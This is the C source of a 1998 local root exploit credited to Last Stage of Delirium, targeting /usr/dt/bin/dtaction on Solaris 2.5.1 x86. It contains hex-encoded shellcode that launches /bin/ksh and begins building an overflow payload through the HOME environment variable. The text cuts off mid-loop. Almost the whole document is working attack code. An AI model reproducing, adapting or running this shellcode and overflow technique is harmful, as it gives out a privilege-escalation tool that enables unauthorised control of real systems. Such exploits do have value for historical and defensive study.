/*## copyright LAST STAGE OF DELIRIUM apr 1998 poland *://lsd-pl.net/ #*/ /*## /usr/dt/bin/dtaction #*/ #define ADRNUM 2500 char shellcode[]= "\xeb\x1b" /* jmp */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),edi */ "\x52" /* pushl %edx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x8(%edx) */ "\x83\xef\x3c" /* subl $0x3c,%edi */ "\xb0\x9a" /* movb $0x9a,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\x47" /* incl %edi */ "\xb0\x07" /* movb $0x7,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\xb0\x3b" /* movb $0x3b,%al */ "\xe8\xe0\xff\xff\xff" /* call */ "/bin/ksh" ; main(int argc,char **argv){ int i; char bufor[10000],*b; char adr[4]={0x30,0x8f,0x03,0x08}; printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland //lsd-pl.net/\n"); printf("/usr/dt/bin/dtaction for solaris 2.5.1 x86\n\n"); b=bufor; sprintf(b,"HOME="); b+=5; *b++=0xeb; *b++=0x2c; for(i=0;i<0x2c;i++) *b++=adr[i%4]; for(i=0;i